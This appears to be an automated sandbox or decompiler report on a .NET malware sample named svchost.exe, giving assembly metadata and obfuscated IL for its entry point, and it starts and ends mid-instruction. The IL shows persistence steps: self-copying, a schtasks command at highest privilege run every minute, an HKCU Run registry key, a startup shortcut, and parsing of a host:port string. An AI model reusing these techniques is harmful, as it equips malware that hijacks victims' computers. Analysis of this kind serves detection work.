Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::fI72ZOLwk6iT7R33UmFkWUFpJ4rI1cIUuMYelDEiklJ0v12gPAn5jbu() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldnull <null> ldftn System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::dQUPQNgtT2r4C9YXVl4uRT8D2jKGqQz6kl8W8KT1GgMcCQPzXwo1jXs() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.3 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name

svchost.exe
Full Name

svchost.exe
EntryPoint

System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::5WrlDg5i655VIwfunw31kaXdH1uqLJr7SYyArUPCesn6aR8kGQX0eSekWl1KY4WSMqM7iD()
Scope Name

svchost.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

svchost
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

459
Main Method

System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::5WrlDg5i655VIwfunw31kaXdH1uqLJr7SYyArUPCesn6aR8kGQX0eSekWl1KY4WSMqM7iD()
Main IL Instruction Count

370
Main IL

ldsfld System.Int32 BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::jA8enWwJZ0U72zssK0t9P8acH22TIYkcGS7gxxcH99ibxgs6A69l0XubtYzUpW0Z0JYRcM ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::s2euPEzvKdAIzisG7FIaqMqXmUCQjmXfHjAJCfbWypctU3KItgS8z0g6mJ3hCDuJQ8RgU1 call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::s2euPEzvKdAIzisG7FIaqMqXmUCQjmXfHjAJCfbWypctU3KItgS8z0g6mJ3hCDuJQ8RgU1 ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::hupExg0CtLbw7dE12iK8OxJeBbzPEvMB13gEPcNnCskz4dvyWEB7TCJnY4nF9feeo6cuWg call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::hupExg0CtLbw7dE12iK8OxJeBbzPEvMB13gEPcNnCskz4dvyWEB7TCJnY4nF9feeo6cuWg ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::XThfXYqC8MGK4M9IoDqf4Cq0Tls73BMenIUvCCusaT6LiUJ4Xq0xiRorzq8ybSrFIomofK call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::XThfXYqC8MGK4M9IoDqf4Cq0Tls73BMenIUvCCusaT6LiUJ4Xq0xiRorzq8ybSrFIomofK ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::v77NisA3VClRNh2cjFOBmtOc55UsDCGqteVVMhmK7SLOA4WbgWCAGnBlz1eS44i1SVlOuD call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::v77NisA3VClRNh2cjFOBmtOc55UsDCGqteVVMhmK7SLOA4WbgWCAGnBlz1eS44i1SVlOuD ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::MKtwhyi9sz8wkOxnU3KFMr9XwYUwOB40bDSmVSfEo2JMzG9r4mtDpKJiRiXxHVdyGFwUkt call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::MKtwhyi9sz8wkOxnU3KFMr9XwYUwOB40bDSmVSfEo2JMzG9r4mtDpKJiRiXxHVdyGFwUkt ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::uJQirOXk1aauEis5IiFQ9sCmlbxQ4l3Dhk56V7jTJynsTa5cnjY5XiLwEb71AfUnPUPiVF call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::uJQirOXk1aauEis5IiFQ9sCmlbxQ4l3Dhk56V7jTJynsTa5cnjY5XiLwEb71AfUnPUPiVF ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::Naxy2Pj0lqzrrtpWpa68gZuS6xXeISE6bH8L3LY3sIIixnhrhJ3cscnY6Kh5Ub7INBHBDX call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::Naxy2Pj0lqzrrtpWpa68gZuS6xXeISE6bH8L3LY3sIIixnhrhJ3cscnY6Kh5Ub7INBHBDX ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::OscshneFCKzTfjbfEZDNP4PTYMNRSRs6bkV4LLdfk9NFNzQG3W2AkchjMi57JKy9m76SAd call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::OscshneFCKzTfjbfEZDNP4PTYMNRSRs6bkV4LLdfk9NFNzQG3W2AkchjMi57JKy9m76SAd ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::ZOZyJtSiWtIiUiu7CJRvfgTuix2M4YqBiiVnUVfCJhdJLjfdeVPb3hXKvB103riiUTd5AD call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::ZOZyJtSiWtIiUiu7CJRvfgTuix2M4YqBiiVnUVfCJhdJLjfdeVPb3hXKvB103riiUTd5AD ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::9O2p0xkbCxBtveASrsNnIFaPUFHcoZMLPhClyYw0ojAqkiU0RUvMjKVZAA1fPXnTgk1Gst call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::9O2p0xkbCxBtveASrsNnIFaPUFHcoZMLPhClyYw0ojAqkiU0RUvMjKVZAA1fPXnTgk1Gst ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::zmcocqrKiU72pItN5Su2IGg0DXVRjem0CyWF2MQ8pCw6F3YrH5DA19duvf7ZXQ0ldplC7g call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::zmcocqrKiU72pItN5Su2IGg0DXVRjem0CyWF2MQ8pCw6F3YrH5DA19duvf7ZXQ0ldplC7g leave.s IL_011C: call System.Boolean Stub.xObx1d3oIBS3ePn::C3BNVPjEadnCAm8() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_011C: call System.Boolean Stub.xObx1d3oIBS3ePn::C3BNVPjEadnCAm8() call System.Boolean Stub.xObx1d3oIBS3ePn::C3BNVPjEadnCAm8() brtrue.s IL_0129: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::9DcX9g9NNktnAldBuVHwVgxp963GvFJETvRdOpnhlS6Ardbe38dIDm15gee0s5shi673VN() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::9DcX9g9NNktnAldBuVHwVgxp963GvFJETvRdOpnhlS6Ardbe38dIDm15gee0s5shi673VN() leave.s IL_013F: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::qQDtU6iUdviFKPfB44pxzgIUT8WorhaGoIfTKEeaqJe8EAokNLTYJ2LiF4a3UU44va7S5J() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_013F: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::qQDtU6iUdviFKPfB44pxzgIUT8WorhaGoIfTKEeaqJe8EAokNLTYJ2LiF4a3UU44va7S5J() call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::qQDtU6iUdviFKPfB44pxzgIUT8WorhaGoIfTKEeaqJe8EAokNLTYJ2LiF4a3UU44va7S5J() ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::uJQirOXk1aauEis5IiFQ9sCmlbxQ4l3Dhk56V7jTJynsTa5cnjY5XiLwEb71AfUnPUPiVF ldstr \ ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_6 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0186: ldloc.1 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_019D: ldc.i4 1000 ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldsfld System.String Stub.xObx1d3oIBS3ePn::qxajNHJ6rhWRrRF call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01C8: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C8: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_10 ldloc.s V_10 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.EqLrnQX2mVX6raqKdT7LRHnHz5aKS67RAADklnVdu65gZ8jh1k60wvj::YxuRWYQ1IuD9orzb53a6VkP0SgHIjZwcrR3lk3iQDrpm48AJ5y1oDxD() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_022E: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_0272: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_10 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0293: call My.I1WyLc3iq4kFXYQMYdySAuov8r7uF6VgJwH4RBcGnXCZ1su0W6KPesYqv584ez1JRGKv8j My.c1E8mGOGtvdg5dvPZx2f7bRSuUpsHNmHSCYhFFLULtbXhUBqEqhNh7FvLpL7nl2WdCpMpW::lJk6CQ2gP01mNygdpWtjy7SahYmBoelvgShHrkQ14mh9XqH7noqfXTC7xvaxadUzSIQtWt() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0293: call My.I1WyLc3iq4kFXYQMYdySAuov8r7uF6VgJwH4RBcGnXCZ1su0W6KPesYqv584ez1JRGKv8j My.c1E8mGOGtvdg5dvPZx2f7bRSuUpsHNmHSCYhFFLULtbXhUBqEqhNh7FvLpL7nl2WdCpMpW::lJk6CQ2gP01mNygdpWtjy7SahYmBoelvgShHrkQ14mh9XqH7noqfXTC7xvaxadUzSIQtWt() call My.I1WyLc3iq4kFXYQMYdySAuov8r7uF6VgJwH4RBcGnXCZ1su0W6KPesYqv584ez1JRGKv8j My.c1E8mGOGtvdg5dvPZx2f7bRSuUpsHNmHSCYhFFLULtbXhUBqEqhNh7FvLpL7nl2WdCpMpW::lJk6CQ2gP01mNygdpWtjy7SahYmBoelvgShHrkQ14mh9XqH7noqfXTC7xvaxadUzSIQtWt() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.1 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_02CE: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02CE: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_13 stelem.ref <null> ldloc.s V_16 stloc.s V_17 ldloc.s V_17 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_18 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_18 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0353: stloc.s V_19 ldloc.s V_17 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_13 stloc.s V_19 ldloc.s V_19 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_19 ldloc.s V_13 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.xObx1d3oIBS3ePn::aoUiRAE5hnul3VV leave.s IL_03D2: call System.Void Stub.lmAt6LnWM5Mi2AOWBuqLk7FJXCTeZ79JAW0PDCw0okgKVMCrweCDHnSEJq3Sg22MUnqgEZqRK::4hbDxL1pJ9C3N5TgHhYS9DH8EuB9yUU97xBcnAbQth1BgwHOwBpbhQMhz9YUjjOyN06Obxp2q() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_03D2: call System.Void Stub.lmAt6LnWM5Mi2AOWBuqLk7FJXCTeZ79JAW0PDCw0okgKVMCrweCDHnSEJq3Sg22MUnqgEZqRK::4hbDxL1pJ9C3N5TgHhYS9DH8EuB9yUU97xBcnAbQth1BgwHOwBpbhQMhz9YUjjOyN06Obxp2q() call System.Void Stub.lmAt6LnWM5Mi2AOWBuqLk7FJXCTeZ79JAW0PDCw0okgKVMCrweCDHnSEJq3Sg22MUnqgEZqRK::4hbDxL1pJ9C3N5TgHhYS9DH8EuB9yUU97xBcnAbQth1BgwHOwBpbhQMhz9YUjjOyN06Obxp2q() ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::MKtwhyi9sz8wkOxnU3KFMr9XwYUwOB40bDSmVSfEo2JMzG9r4mtDpKJiRiXxHVdyGFwUkt call System.String Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::avUcMz6vNlkDxnZNp6DAZ9jawjRyYFSOqSTm961JWJZwjK1LkOaMuwRBmyy0h8imLjt3Do(System.String) stloc.0 <null> ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::OvyIcWcizqs7mH6poPXCTmpNNdvXt8cqChm4gkvbiLFrI1l1Q6NoR98OvmrJmNbvClOIx2 ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.1 <null> ldelem.ref <null> stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::n3jqdXsoxmmXGcxa5X3c161uQDV0Vsvek5GwCqL9Qjo7aQDAk7v9e0oY26ezs2gNoTFfHD call System.Void Stub.xObx1d3oIBS3ePn::rYjhvPjqExZG0A6() ldnull <null> ldftn System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::lkfCKAW9TEjLg7slqealCUVaRb8EmHPhVG3Nl83gSM3N3dG8gQ4AUPS() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::msRFt4R5ibSPcNItDNSXO8DHARafi5olxydlQzfhAk9eej1iwGCWRMr() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.EqLrnQX2mVX6raqKdT7LRHnHz5aKS67RAADklnVdu65gZ8jh1k60wvj::YxuRWYQ1IuD9orzb53a6VkP0SgHIjZwcrR3lk3iQDrpm48AJ5y1oDxD() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_045E: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::Kq6tW72CRaCvtiiEkyzurky6E42mdbzvI1GB1RAB4qVowfibiaXF8vJxhx8498qJEej4kJ() call System.Void Stub.eCikzGaR97ecWdf::QP3FedPgKvhSIEo() call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::Kq6tW72CRaCvtiiEkyzurky6E42mdbzvI1GB1RAB4qVowfibiaXF8vJxhx8498qJEej4kJ() ldnull <null> ldftn System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::fI72ZOLwk6iT7R33UmFkWUFpJ4rI1cIUuMYelDEiklJ0v12gPAn5jbu() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldnull <null> ldftn System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::dQUPQNgtT2r4C9YXVl4uRT8D2jKGqQz6kl8W8KT1GgMcCQPzXwo1jXs() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.3 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void 